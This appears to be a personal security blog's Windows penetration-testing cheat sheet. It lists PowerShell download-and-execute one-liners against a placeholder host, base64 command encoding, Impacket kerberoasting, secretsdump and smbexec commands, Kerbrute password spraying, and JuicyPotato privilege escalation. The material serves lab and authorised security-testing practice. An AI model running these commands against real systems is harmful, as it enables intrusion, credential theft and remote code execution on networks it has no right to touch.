Rethink Security

Windows Cheatsheet

security cheats tools windows powershell AD privesc

Estimated reading time: 2 minutes

So this is the windows equivalent of my post about linux cheatsheets. A lot of the following commands are from labs, cheatsheets, writeups, from friends and colleagues, trial and error and also copied from famous places like hacktricks and ired.team.

I also have grepable cheatsheets to download on my GitHub.

Powershell

Download from remote Webserver

PS> Invoke-WebRequest -Uri "http://<ip>:<port>/shell.ps1." -OutFile "C:\path\file"

With the following command, Powershell downloads the file and executes it immediately

PS> IEX (Invoke-Expression)

PS> IEX(New-Object Net.WebClient).downloadString('http://<ip>:<port>/shell.ps1')

PS> powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://<ip>/wget.exe','C:\Users\Joe\Desktop\wget.exe')"

PS> wget "http://<ip>:<port>/shell.ps1"

Convert commands to base64 in Kali Linux

$ echo -n "Powershell command" | iconv --to-code UTF-16LE | base64 -w 0

Search for files and/or passwords

PS> Get-ChildItem -Hidden -Recursive \path\

Domain

Attacking domains requires a lot of tools. On a linux machine (kali and/or parrot) the Impacket-Toolset1 is essential.

Impacket-GetUserSPNs

$ impacket-GetUserSPNs -request "bigcorp.com/alice":"Password123" -dc-ip <ip>

Impacket-SecretsDump

$ impacket-secretsdump bigcorp.com/Alice:Password123@<ip>

Impacket-smbexec

$ /usr/bin/impacket-smbexec bigcorp.com/joe:Password123@<ip>

Ldapdomaindump2

$ ldapdomaindump -u "BIGCORP\alice" -p "Password123" <ip>

Kerbrute3

Example with password spraying

$ ./kerbrute_linux_amd64 passwordspray usrs.txt "Password123" -d bigcorp.com --dc <ip>

SMB

To mount shares: Open local smb share with impacket-smbshare

$ impacket-smbserver "Sharename" <path>

Mount the smb share on the remote windows machine

PS> New-PSDrive -Name <name> -PSProvider "FileSystem" -Root "\\<ip>\Sharename"

Transfer data with copy - can also be a network path

copy <Source> <Destination>

JuicyPotato

To escalate priviledges with JuilyPotato4 the following tokens/priviledges are needed:

  • SeImpersonatePrivilege
  • SeAssignPrimaryTokenPrivilege

These can be checked with:

whoami /priv

whoami /all

Further check if the host system is x86 or x64 based, to download the correct version of JuicyPotato.

Execute the command (Important: do not use " - which means no nc.exe)

PS> Juicy.Potato.x86.exe -l 9028 -c {4991d34b-80a1-4291-83b6-3328366b9097} -p shell.exe -t \*

PS> JuicyPotato -l 1338 -p shell.exe -t \*

The original exploint seems to not need the -c option, but the x86 derivatives does.

PrivEsc via exploit

It is recommendet for Windows exploits to always google the used versions and the intention (i.e. “Privilege Escalation”, “Exploit”, “0day”). This can help to find additional GitHub repos, which may not be available on searchsploit or exploit suggester.5

Furthermore, check the target server for other interesting hints; for example, if Python is installed on Windows, potential exploits written in Python can be used.

  1. https://github.com/SecureAuthCorp/impacket ↩︎

  2. https://github.com/dirkjanm/ldapdomaindump ↩︎

  3. https://github.com/ropnop/kerbrute ↩︎

  4. https://github.com/ohpe/juicy-potato ↩︎

  5. https://github.com/AonCyberLabs/Windows-Exploit-Suggester ↩︎